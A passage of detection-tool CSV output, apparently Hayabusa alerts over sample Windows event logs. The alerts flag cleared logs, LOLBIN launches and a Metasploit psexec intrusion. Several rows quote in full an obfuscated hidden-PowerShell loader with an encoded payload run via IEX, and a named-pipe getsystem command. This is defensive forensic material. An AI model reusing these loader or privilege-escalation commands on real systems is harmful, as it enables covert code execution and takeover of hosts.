C:\Windows\System32\rundll32.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 23:02:21.413 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x11c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 23:02:21.475 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x720 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 23:03:25.976 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x824 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 23:03:26.007 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6b4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 23:54:49.500 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xc60 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-21 00:10:43.213 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x72c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-21 00:10:56.112 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe 
/Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe88 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-21 00:10:56.268 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xaf4 | User: IEUser | LID: 0x6796c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-21 00:10:56.315 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xad8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-21 00:10:56.331 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa30 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-21 00:10:56.346 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1a8 | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-21 00:10:56.377 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xd08 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-21 00:45:12.871 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb34 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-21 00:45:18.574 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8d4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-21 00:45:25.147 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x270 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-21 00:46:27.941 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible 
LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc90 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-21 00:46:32.738 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8e0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-21 01:33:53.404 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-21 01:34:04.272 +09:00,IE10Win7,104,high,Evas,System Log File Cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: UWdKhYTIQWWJxHfx | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA=''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UWdKhYTIQWWJxHfx | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: UWdKhYTIQWWJxHfx | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-21 01:35:46.605 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0xb2c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-21 01:35:46.608 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden 
-c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA=''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x104 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-21 01:35:46.790 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x5fc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-21 01:35:58.162 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: genusn | Path: cmd.exe /c echo genusn > \\.\pipe\genusn | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-21 01:35:58.162 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: genusn | Path: cmd.exe /c echo genusn > \\.\pipe\genusn,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-21 01:35:58.162 
+09:00,IE10Win7,7045,info,,New Service Installed,Name: genusn | Path: cmd.exe /c echo genusn > \\.\pipe\genusn | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-21 01:35:58.169 +09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo genusn > \\.\pipe\genusn | Path: C:\Windows\System32\cmd.exe | PID: 0xe8c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleMeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-21 01:35:58.169 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo genusn > \\.\pipe\genusn | Path: C:\Windows\System32\cmd.exe | PID: 0xe8c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-21 03:27:25.424 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-21 03:27:39.918 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdec | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-21 03:27:42.755 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe 
/Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x620 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-21 03:27:42.802 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3bc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-21 03:27:44.943 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\g4g34pot.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xc58 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-21 03:28:55.689 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x234 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-21 03:28:55.705 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x924 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-21 03:28:58.267 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\wlqywrdm.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x71c | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-21 03:33:13.923 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\0xqpayvt.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x920 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-21 03:41:27.017 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\kwos13rh.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x760 | User: 